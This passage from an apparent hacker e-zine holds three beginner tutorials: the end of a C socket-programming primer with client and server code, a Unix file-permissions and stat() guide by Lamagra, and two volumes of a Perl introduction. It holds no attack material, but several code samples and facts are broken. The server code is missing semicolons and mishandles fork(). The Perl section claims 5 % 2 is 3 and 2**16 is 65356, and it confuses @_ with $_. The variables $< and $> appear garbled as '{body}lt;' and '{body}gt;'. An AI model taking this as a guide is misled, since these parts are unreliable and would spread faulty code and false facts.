for you to do...oh, you can do the error checking in it to :)
------
<++> socket/server.c
/* SERVER PROGRAM */
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 1500 /* the port users will be connecting to */
#define BACKLOG 5 /* how many pending connections queue will hold */
main()
{
int sockfd, new_fd; /* listen on sock_fd, new connection on new_fd */
struct sockaddr_in my_addr; /* our address information */
struct sockaddr_in their_addr; /* their address information */
int sin_size;
sockfd = socket(AF_INET, SOCK_STREAM, 0);
/* remember to error check (-1 on error) */
my_addr.sin_family = AF_INET; /* host byte order */
my_addr.sin_port = htons(PORT); /* short, network byte order */
my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */
bzero(&(my_addr.sin_zero), 8); /* zero the rest of the struct */
bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));
listen(sockfd, BACKLOG)
while(1) { /* start out accept() loop */
sin_size = sizeof(struct sockaddr_in);
new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)
printf("server: got connection from %s\n", inet_ntoa(their_addr.sin_addr));
fork(); /* this is the child process */
send(new_fd, "Hello, world!\n", 14, 0)
close(new_fd);
exit(0);
while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child processes */
}
}
/* END SERVER PROGRAM, REMEMBER TO DO YOUR ERROR CHECKING */
<-->
<++> socket/client.c
/* CLIENT PROGRAM */
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 1500 /* the port client will be connecting to */
#define MAXDATASIZE 100 /* max number of bytes we can get at once */
int main(int argc, char *argv[])
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr; /* connector's address information */
if (argc != 2) {
fprintf(stderr,"Usage: client \n");
exit(1);
}
he = gethostbyname(argv[1]); /* get the host info */
/* did you check for errors? */
sockfd = socket(AF_INET, SOCK_STREAM, 0);
their_addr.sin_family = AF_INET; /* host byte order */
their_addr.sin_port = htons(PORT); /* short, network byte order */
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8); /* zero the rest of the struct */
connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr));
numbytes = recv(sockfd, buf, MAXDATASIZE, 0);
buf[numbytes] = '\0';
printf("Received: %s",buf);
close(sockfd);
return 0;
}
/* END CLIENT...YOU CHECKED FOR ERRORS RIGHT? :) */
<-->
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Well, I think that's about it for now. This is by no means the complete
guide to socket programming, actually, it's very far from being that and
was never intended to be that so no problem. For further reading on this
topic I would suggest checking out the following man pages:
socket, bind, connect, perror, herror, listen, accept, send, recv, close,
shutdown, getpeername, getsockname, gethostbyname, gethostbyaddr and
getprotobyname.
You may also find the following book to be good reading:
------
Internetworking with TCP/IP, volumes I-III by Douglas E. Comer and David
L. Stevens. Published by Prentice Hall. Second edition ISBNs: 0-13-468505-9,
0-13-472242-6, 0-13-474222-2. There is a third edition of this set which
covers IPv6 and IP over ATM.
Using C on the UNIX System by David A. Curry. Published by O'Reilly &
Associates, Inc. ISBN 0-937175-23-4.
TCP/IP Network Administration by Craig Hunt. Published by O'Reilly &
Associates, Inc. ISBN 0-937175-82-X.
TCP/IP Illustrated, volumes 1-3 by W. Richard Stevens and Gary R. Wright.
Published by Addison Wesley. ISBNs: 0-201-63346-9, 0-201-63354-X,
0-201-63495-3.
UNIX Network Programming by W. Richard Stevens/ Published by Prentice
Hall. ISBN 0-13-949876-1.
-------
Wanna get the absolute lowdown on things? Check out these RFC's:
------
RFC-768 -- The User Datagram Protocol (UDP)
(ftp://nic.ddn.mil/rfc/rfc768.txt)
RFC-791 -- The Internet Protocol (IP)
(ftp://nic.ddn.mil/rfc/rfc791.txt)
RFC-793 -- The Transmission Control Protocol (TCP)
(ftp://nic.ddn.mil/rfc/rfc793.txt)
RFC-854 -- The Telnet Protocol
(ftp://nic.ddn.mil/rfc/rfc854.txt)
RFC-951 -- The Bootstrap Protocol (BOOTP)
(ftp://nic.ddn.mil/rfc/rfc951.txt)
RFC-1350 -- The Trivial File Transfer Protocol (TFTP)
(ftp://nic.ddn.mil/rfc/rfc1350.txt)
------
Well, this is it I guess, time to bid you a farewell and a happy journey
into sockets programming. As I said before, this is *NOT* a complete
manual, it is merely a small primer. There maybe huge errors in here that
I've totally missed, oh well, such is life, I never claimed to be an
expert ;) Maybe soon I'll get around to doing a paper on type SOCK_DGRAM
and other such socket oddities. 'Till then, have fun.
~xphantom
=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
-------[ File permissions
by Lamagra
http://bounce.to/unah16
-----------[ Introduction
Although permissions determine who can read, write or execute a file, they also determine the
file type, and how the file is executed.
You can display the permissions of a file with the command 'ls -l'.
An example listing might look like this:
Drwx------ 2 tom users 512 Jan 3 13:44 Mail
Drwx------ 5 tom users 1024 Jan 17 08:22 nsmail
drwx------ 2 root root 512 Dec 28 22:44 bin
-rw-r--r-- 1 tom users 23801 Jan 4 15:05 picture.gif
-rw------- 1 tom users 787 Jan 12 06:35 prog.c
-rwx--x--x 1 tom users 44692 Jan 12 06:41 prog
1 2 3 4 5 6 7
The first column shows us the file permissions, the second column tells us the
number of links to the file, and the third column shows who owns the file.
The fourth column shows to what group the file belongs, the fifth column tells
the number of bytes used by the file. The sixth column holds the date and time
of creation, and the seventh shows the name.
-----------[ Permissions
The file permission field is divided into four sub-fields:
- rwx rwx rwx
The first sub-field defines the file type.
The different types are:
- normal file
b block device
c character device
d directory
l symbolic link
The next tree sub-field define the actual file permissions.
The first three characters are the user permissions, the next three the group permissions and the
last three are the permissions for everyone else.
The characters have the following meanings:
r read permission
w write permission
x permission to execute
s user ID bit
t sticky bit
The sticky bit tells the system to save a copy of a running program in memory
after the program completes. This way the system can save a little amount of
time, the next time the program is executed. Because it doesn't have to be
reloaded into the memory.
Permissions can be changed with the 'chmod' command in a absolute or relative manner.
The absolute manner uses octal permissions, the following table shows a list of
valid octal permissions.
0001 executes permission for the everyone
0002 write permission for the everyone
0004 read permission for the everyone
0010 execute permission for the group
0020 write permission for the group
0040 read permission for the group
0100 execute permission for owner
0200 write permission for owner
0400 read permission for owner
1000 sticky bit
2000 group ID bit if the file is executable, otherwise mandatory file locking
4000 user ID bit if the file is executable
You give a file read, write permission for the owner and read permission for group and everyone
else in the following manner:
0200 write permission for owner
0400 read permission for owner
0040 read permission for group
0004 read permission for everyone
______________________________________
0644 read and write for owner + read for everyone.
chmod 644 file
Relative permissions are slightly different. You have to state the following:
* whom you're giving permissions to
* what operation you intend to preform
* what the permissions are
whom:
a all users
g group
o others
u user
operator:
+ add
- remove
= set
permissions:
the characters above
example:
read and write for owner + read for everyone
chmod u=rw,g=r,o=r file
-----------[ SUID and SGID
SUID is short for Set User ID, and SGID is short for Set Group ID.
When you run an executable file with these permissions, it's effective UID
(User ID) is set the same as the user that owns the file.
SGID is similar except it changes the GID (Group ID) instead.
Although this feature is very useful, it can present a huge security hole.
SUID programs are generally used when the program needs special permissions,
such as root permission, to run.
-----------[ file permissions in C
Every single bit of information about a file is found inside a structure
called an i-node. To get that information you can use the three following
system calls:
int stat(const char *path, struct stat *statb);
int lstat(const char *path, struct stat *statb);
int fstat(int fd, struct stat *statb);
"stat" is the most commonly used syscall of the three. It gets the
information on a file using the path and places it into the structure
statb.
The only difference between lstat and stat is that when the file is a symbolic
link stat would return information about the file to wherever the link happens
to point to. While lstat actually returns info about the link itself.
Fstat takes a fd to an open file and reads info about the file.
The structure stat can be found in /usr/include/sys/stat.h and is defined
as the following:
struct stat
{
dev_t st_dev; /* device */
ino_t st_ino; /* inode */
mode_t st_mode; /* file permissions */
nlink_t st_nlink; /* number of hard links */
uid_t st_uid; /* user ID of the owner */
gid_t st_gid; /* group id of the owner */
dev_t st_rdev; /* device type*/
off_t st_size; /* total size in bytes */
unsigned long st_blcksize; /* blocksize for filesystem I/O */
unsigned long st_blocks; /* number of blocks */
time_t st_atime; /* time of last access */
time_t st_mtime; /* time of last modification */
time_t st_ctime; /* time of last change */
};
st_dev: This is the major and minor device numbers of a device
on which the i-node associated with this file
(and therefore the file itself) is stored.
st_nlink: The number of links associated with a file. If a file has
just been created, it has the value of '1'. This value is
incremented by 1 for every hard link that is made to
the file.
st_rdev: If the file is a character-special or block-special device
then this field contains the major and the minor dev numbers
of the file. (Unlike st_dev which has the major and minor
dev numbers of the device on which the file is stored.)
st_atime: The last time the file was accessed for reading or
the last time that it was executed, if executable.
st_mtime: This is changed by write(), mknod(), utime(), and by changes
in owner, group, hard link count, or mode.
st_ctime: This is changed by writing and changes of i-node information
(owner, group, link count, etc.)
st_blksize: A hint to programs about the best buffer size to use for
i/o operations on this file.
st_blocks: The total number of physical blocks that are actually allocated
on the disk for this file.
st_mode member of struct stat defines both the file type and its
permission bits. The following constants are used to determine the file type:
S_IFMT: bitmask for the file type bitfields.
S_IFREG: Regular file
S_IFDIR: Directory
S_IFCHR: Character device
S_IFBLK: Block device
S_IFLNK: Symbolic link
S_IFIFO: FIFO file
S_IFSOCK: socket
There are also a set of POSIX macros to check the file type:
S_ISREG: regular file.
S_ISDIR: directory.
S_ISCHR: character device.
S_ISBLK: block device.
S_ISLNK: symbolic link.
S_ISFIFO: FIFO type file.
S_ISSOCK: socket.
The next constants, will give you information about a files ownership,
permission values etc.
S_ISUID: User ID bit set.
S_ISGID: Group ID bit set.
S_ISVTX: Sticky bit set.
S_IRWXU: The owner has read, write and execution permission.
S_IRUSR: The owner has read perms for the file (same as S_IREAD).
S_IWUSR: The owner has write perms for the file (same as S_IWRITE).
S_IXUSR: The owner has execute perms for the file (same as S_IEXEC).
S_IRWXG: The group has read, write and execution permission.
S_IRGRP: The group has read perms for the file.
S_IWGRP: The group has write perms for the file.
S_IXGRP: The group has execute perms for the file.
S_IROTH: Everyone has read perms for the file.
S_IWOTH: Everyone has write perms for the file.
S_IXOTH: Everyone has execute perms for the file.
----->cut here<-------->cut here<-------->cut here<-------->cut here<----
<++> perms/mystat.c
/*
gcc mystat.c -o mystat
*/
/* includes */
#include
#include
#include
#include
/* prototypes */
char *filetype(mode_t);
char *fileperms(mode_t);
void statinfo(char *, struct stat *);
void usage(char *prog)
{
printf("usage: %s \n",prog);
exit(-1);
}
void main(int argc, char **argv)
{
struct stat st;
if(argc != 2)usage(argv[0]);
if(lstat(argv[1], &st) < 0) {
perror(argv[1]);
exit(-1);
}
statinfo(argv[1], &st);
exit(0);
}
void statinfo(char *filename, struct stat *st) {
printf("File Name:\t%s\n", filename);
printf("File Type:\t%s\n", filetype(st->st_mode));
if(((st->st_mode & S_IFMT) != S_IFCHR) && ((st->st_mode & S_IFMT) != S_IFBLK)) {
printf("File Size:\t%d bytes, %d blocks\n", st->st_size, st->st_blocks);
printf("I/O Unit:\t%d bytes\n", st->st_blksize);
}else{
printf("Device Numbers: Major: %u Minor: %u\n", major(st->st_rdev), minor(st->st_rdev));
}
printf("Permissions:\t%s(%04o)\n", fileperms(st->st_mode),st->st_mode & 07777);
printf("Inode Number:\t\t%u\n", st->st_ino);
printf("Owner Userid:\t\t%d\n", st->st_uid);
printf("Owner Group-id:\t\t%d\n", st->st_gid);
printf("Hard link count:\t%d\n", st->st_nlink);
printf("File system device: Major: %u Minor: %u\n", major(st->st_dev), minor(st->st_dev));
printf("Last access:\t\t%s", ctime(&st->st_atime));
printf("Last modification:\t%s", ctime(&st->st_mtime));
printf("Last i-node change:\t%s", ctime(&st->st_ctime));
}
char *filetype(mode_t mode)
{
switch(mode & S_IFMT) {
case S_IFREG:
return("regular file");
case S_IFDIR:
return("directory");
case S_IFCHR:
return("character device");
case S_IFBLK:
return("block device");
case S_IFLNK:
return("symbolic link");
case S_IFIFO:
return("fifo");
case S_IFSOCK:
return("socket");
}
return(NULL);
}
char *fileperms(mode_t mode)
{
int i;
char *p;
static char perms[10];
p = perms;
strcpy(perms, "---------");
for(i=0;i<3;i++) {
if(mode &(S_IREAD>>i*3))
*++p='r';
if(mode &(S_IWRITE>>i*3))
*++p='w';
if(mode &(S_IEXEC>>i*3))
*++p='x';
}
if((mode & S_ISUID))
perms[2] = 's';
if((mode & S_ISGID))
perms[5] = 's';
if((mode & S_ISVTX))
perms[8] = 't';
return(perms);
}
<--> end of mystat.c
-----------[ Changing file permissions in C
If you need to change the file permissions, you can use this set of functions:
chmod(const char *path, mode_t mode);
fchmod(int fd, mode_t mode);
For mode you can use the permission flags above or octal numbers.
If your using octals, make sure they're always in a set of 5 numbers.
example:
use chmod("/tmp/bla", 00444) to make /tmp/bla readable for everyone.
To change ownership, you can use these system calls:
chown(const char *path, uid_t owner, gid_t group);
lchown(const char *path, uid_t owner, gid_t group);
fchown(int fd, uid_t owner, gid_t group);
If owner/group is -1, the owner/group will remain the same as before.
-----------[ Ending
I hope you learned something new, although file permissions are really basic.
For the next edition of the e-zine, I'll write some more difficult guides.
Like always if you any further questions, remarks or anything.
You can find me on IRC (irc.box5.net) in some channel.
Until we meet again, lamagra out.
----[ EOF
An introduction to perl
=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
Perl: Volume 1
Hello and welcome to the Perl section of the list. This is
Darkmo0n, Im gonna be writing some Perl tutorials for the list. When we're
all done you should know enough Perl to make almost anything ya want. So..
lets get started already..
WHAT IS PERL:
Perl (Practical Extraction and Reporting Language) and is an
INTERPRETED language desgined by Larry Wall in the late 80's as a tool to
create reports from many files on the UNIX operating system. As we learn
more and more Perl, you will notice that many of its functions have to do
with managing files, manipulating or searching strings or patterns. The
fact that Perl is an interpreted language means that It does not need to
be compiled or linked to be run, just a plain text file, like shell
scripts. Unlike shell scripts, Perl offers the power and flexibility of
high level languages like C, but does an excellent job of simplifying many
tasks. For example, Perl internally handles all variable types. So the
same variable can be used to hold strings, integers or other data types.
And you can forget about malloc(), Perl handles all memory internally.
As you'll see, Perl is extremly easy to learn, especially if you
have any experiance with other programming languages, heh imagine.. even
*I* learned Perl.
GETTING PERL:
Alright, in order to learn Perl, you need to get yourself the
interpreter. It comes packaged with most Linux distributions.
Check if you already have it:
-----------------------------
Dark@darkness Dark >$ perl -v
This is perl, version 5.005_03 built for i386-linux
Copyright 1987-1999, Larry Wall
Perl may be copied only under the terms of either the Artistic License or
the GNU General Public License, which may be found in the Perl 5.0 source
kit.
Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'. If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
---------------------------
If you got a command not found, you can try other search utilities like
whereis, locate, or find (Refer to the man pages if ya dont know how to
use em). If you dont have Perl, run a search on freshmeat.net or another
app finder to locate the latest version.
For you guys stuck in Win9x (I pity you, really. Get Linux for
God's sake!), you can go to www.activestate.com to get a version of perl
that will work for you.
NOTE: Not all commands that work *nix versions of Perl will work
in the Win32 version (ex. getpwent(), and many of the file test
functions). All perl scripts shown here are for the *nix version of perl.
PERL LESSON 1:
OK, now that we have perl up and running, lets start learning
already. Perl programs, like all high-level programming language's
programs, are made up of statements. Like in C, every Perl statement must
end in a ; (semicolon), and white space is ignored. For example,
print "hello";
is a valid Perl statement.
print
"hello"
;
is ALSO valid.
print; "hello"
INVALID.
print "hello"
INVALID (No semicolon).
Now, lets do everyone's first program in ANY new language, Hello World.
(NOTE: Line numbers are for reference only, dont type em in)
1: #! /usr/bin/perl
2: print "Hello, World!\n";
Ok type that in in your favorite plain text editor (vi, notepad, pico
whatever as long as it saves in plain text), and save it. To run a perl
script in *NIX:
Dark@darkness Dark >$ chmod +x hello.pl
Dark@darkness Dark >$ ./hello.pl
Hello, World!
Dark@darkness Dark >$
In Windows:
C:\> perl hello.pl
Hello, World!
C:\>
Alright, now lets take a look at the program....
LINE 1: #! /usr/bin/perl
That line contains the path to your Perl interpreter. ALL PERL PROGRAMS
MUST START WITH THAT LINE. A program that doesnt start like that, will not
run correctly. Also, if you want to run the interpreter with some command
line options, you would include them there. For example, its good practice
to run Perl with the -w switch, which increases the warnings on the
scripts, which aids in debugging. To use the -w, change line 1 to:
#! /usr/bin/perl -w
LINE 2: print "Hello, World\n";
There's our first Perl statement, a print command. The syntax for print
(for now) is:
print "STRING";
Prints STRING to STDOUT.
\n is known as an escape sequence. If your'e familiar with C, you know
that \n represents a New line character, signals the end of a line of text
on the screen. There are several legal escape sequences in Perl, here are
the more widely used ones:
\a : Alarm (*beep*)
\t : Tab
\n : New line
\r : Carriage Return
\0xx : ASCII code for a character in Octal notation
\xXX : ASCII code for a character in Hex.
There are a few other common ones, but those will be covered when we do
Regular Expressions and Patterns.
Comments in Perl are created by the #, pound sign. When a # is reached, the rest of the
line is skipped. Notice the # on the first line of all Perl programs, that
makes the interpreter skip that line. That line is for the shell/operating
system's use only.
#! /usr/bin/perl
# print "This line wont execute\n";
$scalar = "adfas"; # this is a partial line comment
Perl: Volume 2 - Variables & Operators
Traditionally, the second lesson in any programming language is
variables and data storage. Today, we will explore the 3 Perl variables
types: Arrays, Scalars, and Hashes (No, there will be no pot in the hash
section). After we cover the data types, we will also discuss mant of the
simple operators Perl has to offer. After this lesson, you will know
enough to make your own simple Perl programs.
NOTE: Complete dominance of these topics is REQUIRED to become a good Perl
programmer, ESPECIALLY the section on arrays and hashes, since these are
the main components of any complex data structure you will be creating in
Perl.
ANOTHER NOTE: This volume is LONG (19 kb, four times more than the last
one.), it took me three days to write it all. I recommend that you read
the Variable section first, take a break, and then continue on the
operators. If you attempt to read this all in one sitting, you are either
really bored, or have a LOT of free time on your hands.
FINAL NOTE BEFORE WE BEGIN: There are plenty of examples in this one, be
sure to take a look at all of them and understand why they act the way
they do. This will help you prevent many annoying bugs in your future
programs. (For each of the examples I included, I have made those mistakes
in the past with similar code, I included them so you wont have to.)
------------------------------------------------------------------------
PERL VARIABLES:
Perl has 3 different kinds of variables: Scalars, Arrays and
Hashes. Each of these can be used to hold numbers, integers, floating
point numbers, characters, strings etc. People familiar in C will find
this quite different from what they are used to: there are no variable
"type". For example, a scalar can be first used to hold a number, and
later, without any modification, can be reassigned to a string.
To learn about the variable types, we need to know how to set
them.
The = Operator:
The = operator assigns the value at the left, to the variable on
the right.
In Perl, when you assign a value to a scalar, it ALWAYS must
begin with a $ (dollar sign), array variables ALWAYS must begin with a @
(an "at" sign) and hashes ALWAYS must begin with a % (percentage sign).
Strings should always be in double quotes ("") or single quotes (''),
since single back quotes (``) have special meaning in Perl (that will be
covered later). Numeric values dont need to be quoted.
-------------------------------------
NOTE:
Variables in Perl are CASE SENSITIVE. $scalar, $SCALAR, and
$ScALAR are *DIFFERENT* variables. Personally, I use variables that hold
more more permanent settings in all caps, while all regular variables in
lowercase.
NOTE:
Also, variable names in Perl must be all alphanumberic characters
(0-9, a-z, A-Z, _). The first letter in the variable name cant be a _. For
example:
$address LEGAL
$new! NOT LEGAL
$_temp NOT LEGAL
Variables that contain non-alphanumeric characters are set
internally by Perl, such as $_, {body}lt;, {body}gt;, $| and $#array.
LAST NOTE: Perl uses different variable space for each type of variable.
You can have a scalar named $temp and an array named @temp defined at the
same time: they wont interfere with each other.
-------------------------------------
SCALARS: These variables hold single values or strings. For example:
<++> perl/scalars.pl
#! /usr/bin/perl -w
$scalar = "This is a scalar variable:";
$scalar2 = 3.1415926;
print "$scalar $scalar2\n";
<--> end scalars.pl
OUTPUT:
Dark@darkness work >$ chmod +x scalars.pl
Dark@darkness work >$ ./scalars.pl
This is a scalar variable: 3.1415926
Dark@darkness work >$
ARRAYS: These variables hold more than one string, and is indexed by
numbers. NOTE: Array subscripts start counting, by default, at the number
0, like in many other languages. If you arent used to counting up from 0,
you can change this by setting the special $[ scalar to the value you want
to count from. Special variables, such as $[, $_, and others, will be
discussed in detail in another volume.
For example:
<++> perl/arrays.pl
#! /usr/bin/perl
@array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");
print "$array[0]\n\n";
print "$array[5]\n";
<--> end arrays.pl
OUTPUT:
Dark@darkness Dark >$ chmod +x arrays.pl
Dark@darkness Dark >$ ./arrays.pl
2
Im a 3l33t Perl h4x0r
Dark@darkness Dark >$
Some of the most observant ones of you might be asking "Why the hell is
there a $ infront of the array name, if its not a scalar??". This is a
point of confusion to many people beginning in Perl. When you refer to the
ENTIRE array, it is prefixed with a @. When you refer to individual
elements of the array, it is prefixed with a $.
You can assign values to members of an array like:
$array[100] = "This is a string";
Or you can assign the whole array at once using a LIST. Lets look at the
declaration of @array in the previous example:
@array = (2, 3, 4, "data", 34.023, "Im a 3l33t Perl h4x0r");
This array is declared by a list. Lists are simply one or more values
seperated by commas. Some Perl docs you may read refer to strings as
lists with only one member, which is also correct.
HASHES: Now everyone's favorite variable type, the hash. Hashes are
the most powerful data types in Perl. Their use might not be apparent
right away, but when you start programming more complicated programs, its
existance will make your life SO much easier. A hash is exactly like an
array, just that its values are indexed by strings, not numbers.
<++> perl/hash.pl
#! /usr/bin/perl
%hash = ("RED", 0xFF0000, "GREEN", 0x00FF00, "BLUE", 0x0000FF);
print "Red is: $hash{'RED'} in RGB\n";
print "Green is: $hash{'GREEN'} in RGB\n";
print "Blue is: $hash{'BLUE'} in RGB\n";
<--> end hash.pl
OUTPUT:
Dark@darkness Dark >$ chmod +x hash.pl
Dark@darkness Dark >$ ./hash.pl
Red is: 16711680 in RGB
Green is: 65280 in RGB
Blue is: 255 in RGB
Dark@darkness Dark >$
Hrmm.. something didnt go as planned.. in the hash declaration, we put
0xFF0000 as RED, but the print function printed a "16711680". Why? In our
declaration, 0xFF0000 was not quoted. Since it is a valid integer in hex,
Perl changed it to decimal and then stored it into the hash. Then it was
printed to stdout by print. How do we change this? In the declaration,
quote the value for RED. This forces Perl to interpret it as a string, and
does not do the conversion.
OUTPUT:
Dark@darkness Dark >$ ./hash.pl
Red is: 0xFF0000 in RGB
Green is: 0x00FF00 in RGB
Blue is: 0x0000FF in RGB
Dark@darkness Dark >$
Earlier we used the hex values in "numeric context," meaning that it was
interpreted as a number. The second, it was used in string, or scalar
context, meaning that it was interpreted as a string. Same values used in
different contexts can have very different results. Here is another
example using arrays:
<++> perl/context.pl
#! /usr/bin/perl
@array = (23, 156, "this is an array");
$scalar = @array;
$scalar2 = "@array";
print "$scalar\n";
print "$scalar2\n";
print "@array\n";
print "$array[0] $array[1] $array[2]\n";
<--> end context.pl
OUTPUT:
Dark@darkness Dark >$ chmod +x context.pl
Dark@darkness Dark >$ ./context.pl
3
23 156 this is an array
23 156 this is an array
23 156 this is an array
Dark@darkness Dark >$
Hrm.. thats strange.. we refered to the same array in different ways, but
the first line looks different. Why? Lets look at how we use the
variable..
$scalar = @array;
...
print "$scalar\n";
Here, we use @array in numeric context.. and set that value to $scalar.
When an array name is used in numeric context, it returns the NUMBER OF
MEMBERS OF THE ARRAY. THIS IS *NOT* THE SUBSCRIPT OF THE LAST ARRAY VALUE.
The last array value is @array - 1, or can also be obtained as $#array, a
variable set internally by Perl that holds the subscript of the last array
member. Ex: $members[$#members] returns the last member of array @members.
The $#array variable can be increased, decreased, like any other variable,
but changeing its value ALSO CHANGES THE SIZE OF THE ARRAY. For example:
<++> perl/chsize.pl
#! /usr/bin/perl
@array = ("one", "two", "three");
$#array--;
print "@array\n";
<--> end chsize.pl
OUTPUT:
Dark@darkness Dark >$ chmod +x chsize.pl
Dark@darkness Dark >$ ./chsize.pl
one two
Dark@darkness Dark >$
Notice that the last member of the array is gone, since the array size was
decreased.
FUNCTIONS THAT ACT ON VARIABLES:
Ok, now back to hashes.. Many of you might not immediately notice the
importance of hashes, but lets explore them a bit more. We know that
hashes are indexed by strings, and we also know that scalars and arrays
also can hold strings... we can do some nice stuff... things like
$hash{"$scalar"} returns the hash value indexed with the key of the
contents of $scalar.
If we use this convention, we might also need to know which keys exist in
the hash. This is accomplished by the keys() call.
SYNTAX: keys(%hash)
Returns a list of all keys in %hash
for example we can:
@array = keys(%hash);
and then loop through the members of @array, to find all the values in the
hash. We can also determine whether a key exists in a hash, with the
exists() call.
SYNTAX: exists($hash{"key"})
Returns true if key exists in %hash, false otherwise. This is
commonly used in conditional statements.
and we can also delete a key from a hash using, you guessed it, the
delete() call.
SYNTAX: delete($hash{"key"})
Deletes key from %hash. After this is done, the value at that key
will be also lost.
Scalars and arrays also have the same type of commands:
SYNTAX: defined($scalar), defined(@array);
Returns true if $scalar or @array exists, false otherwise. Also
used in conditionals.
SYNTAX: undef($scalar), undef(@array);
Undefines $scalar or @array. Contents of each will be lost. Undef
is also used with many Perl functions that returns lists. For example:
(undef, $file) = split(/=/, $scalar, 2);
This split call returns a two member list of values. If we only want the
second one, we can automatically undefine it, while keeping the second.
Split will be covered later when we discuss regular expressions and string
manipulation.
SYNTAX: $scalar = join("string", @array);
Converts an array into a single string, by joining all the members
of the array, separating them by "string". For example:
<++> perl/join.pl
#! /usr/bin/perl
@array = ("a", "random", "array", "of", "values", 23);
$scalar = join("::", @array);
print "$scalar\n";
<--> end join.pl
OUTPUT:
Dark@darkness Dark >$ ./join.pl
a::random::array::of::values::23
Dark@darkness Dark >$
This function is mainly used to concatenate a whole array into a
scalar to later print it to a sort of configuration file. Like, you have
an array returned by getpwent(), and join it to create a copy of the
/etc/passwd entry.
SPECIAL VARIABLES:
Perl has a LOT of special system variables which are
automatically set on runtime. These variables control many aspects of the
program, and also gives the program access to operating system data.
@ARGV : Command line arguments
Like in many other languages, the @ARGV array holds the arguments
given after the program name at the command line. Unlike in C, $ARGV[0]
does NOT hold the program name, it holds the first arguement after the
program name. The name of the program is held in special varable $0.
<++> perl/argv.pl
#! /usr/bin/perl
print "$0 @ARGV\n";
<--> end argv.pl
OUTPUT:
Dark@darkness Dark >$ ./argv.pl this is a test
./argv.pl this is a test
Dark@darkness Dark >$
%ENV : Environment Variables
This hash holds the names and values of all environment variables
currently set. For example: $ENV{"PATH"} will return the contents of your
PATH environment variable. Like any other hash , you can set new values to
this one.
$ENV{"TESTER"} = "blah";
This code fragment sets a new environment variable named TESTER to the
string "blah". The delete(), and exists() functions can also be used on
this hash.
%SIG : Signals
This hash is Perl's frontend for signal traping. In later volumes,
we will use referances and this hash to create an unkillable process, and
timeout counters.
@_ : Default pattern and search space
This is the mother of all Perl special variables. If its used in a
subroutine, it holds the arguments passed to the sub. If used when reading
from a file, its set to the data being currently read. If functions that
regularly require a value to execute have that value ommited, they will
use the contents of @_. For example:
<++> perl/mother.pl
#! /usr/bin/perl
$_ = "This is a test\n";
print;
<--> end mother.pl
OUTPUT:
Dark@darkness Dark >$ chmod +x mother.pl
Dark@darkness Dark >$ ./mother.pl
This is a test
Dark@darkness Dark >$
Just remember, when you arent sure what data a function is working on,
odds are that it is using @_.
{body}lt; : Process UID
Since we all are interested in suid programs (hehe), I decided to
include this one in the last minute. {body}lt; returns the numeric uid of the
process. Like any other variable, it can be set to other values. For
example:
{body}lt; = 0;
This code frag is identical to doing setuid(0) in C.
NOTE: Before you start making SUID root programs in Perl, let me warn you
about something. Perl has a lot of security when it runs suid root, this
security is called "taintedness". Later we will explore suid root programs
and tainted variables, but until then, read: man perlsec.
OK, thats all Im going to cover (for now) on Perl variables. I know its
a long ass section, but you need to know this stuff so you can start
fooling around with real Perl programs.
-----------------------------------------------------------------------
If you havent taken a little break yet, DO IT NOW! Now we are gonna talk
perl operators....
-----------------------------------------------------------------------
PERL OPERATORS:
OK.. that mostly covers Perl data types.. now that we are all rested we
will list many of the basic operators Perl offers.
++, -- Increment and Decrement.
USAGE: $scalar++; ++$scalar; $scalar--; --$scalar;
Increases or decreases the value of $scalar. NOTE: If the operator
appears before the variable name, the variable is increased before it is
used. If the operator is after the variable, it is decremented after the
variable is used. This is only important if the increment or decrement is
embedded in other Perl statements. When used alone, it really doesnt
matter which convention you use.
*, /, -, +, % Multiplication, Division, Subraction, Addition and Modulo
USAGE: $scalar = 4 * 25; $scalar = 100 % 13; etc etc..
Performs mathmatical function depending on the symbol. I dont
really think I need to show many examples of this.... most of you can add
anyway ;)
Modulo might be a bit unknown. It returns the remainder of the
division of the two operands. For example: 5 % 2 return 3, because 5
divided by 2 is 1 remainder 3. Its most commonly used to print text after
a set numbers of an iteration of a loop. An example of this will be given
when we cover conditionals and loops in the next volume.
** Exponentiation
USAGE: $scalar = 5 ** 2;
Returns the value of the first operand to the power of the second.
For example: $scalar = 2 ** 16; returns 65356, 2 to the power of 16.
. Concatenation Operator
USAGE: $scalar = "string1" . "string2"; $scalar = $var . $var2;
This operator basically smushes both operators together into one
string. For example: "one" . "two"; returns "onetwo". This is useful to
combine the value of different scalars into one. Kinda like strcat() in C.
------------------------------------------------------------------
NOTE: The above operators (except ++ and --) can be written in shorthand.
For example: $var = $var + 20; is equivalent to $var += 20; $var %= 3; is
equal to $var = $var % 3; $var++; is equal to $var += 1; $var =
$var . "string"; is equal to $var .= "string"; If you dont notice the
pattern yet, msg me on IRC or email me =)
------------------------------------------------------------------
.. Sequence Operator
USAGE: @array = (a .. z);
This is one of my favorite operators, mainly because it turns a
really long ass line of code into a simple statement. It returns a list of
all values between the operands. For example:
@array = (a .. z);
print "@array\n";
This snippet of code prints out: a b c d e f g h i j k l m n o p q r s t u
v w x y z. All of the values between the operand "a" and the operand "z".
This also works for numbers, floating point numbers, etc etc. I mostly use
this in foreach loops, which we will cover next volume.
x Repetition operator
USAGE: $scalar = "--" x 2;
Repeats the STRING the number of times shown by the integer. EX:
"xy" x 3; return "xyxyxy"
&&, ||, ! Logical AND, OR, NOT
These are usually used in conditionals, loops, or error checking.
These will be discussed in more detail next volume.
&, |, ^, <<, >> Bitwise AND, OR, XOR, Left shift, Right shift
These operators modify the operands in at the binary level. The
only time I *EVER* use these is to decode returning codes of a stat()
call, or for encryption schemes. I wont be covering these, but you can
read your Perl documentation for more info (man perlop).
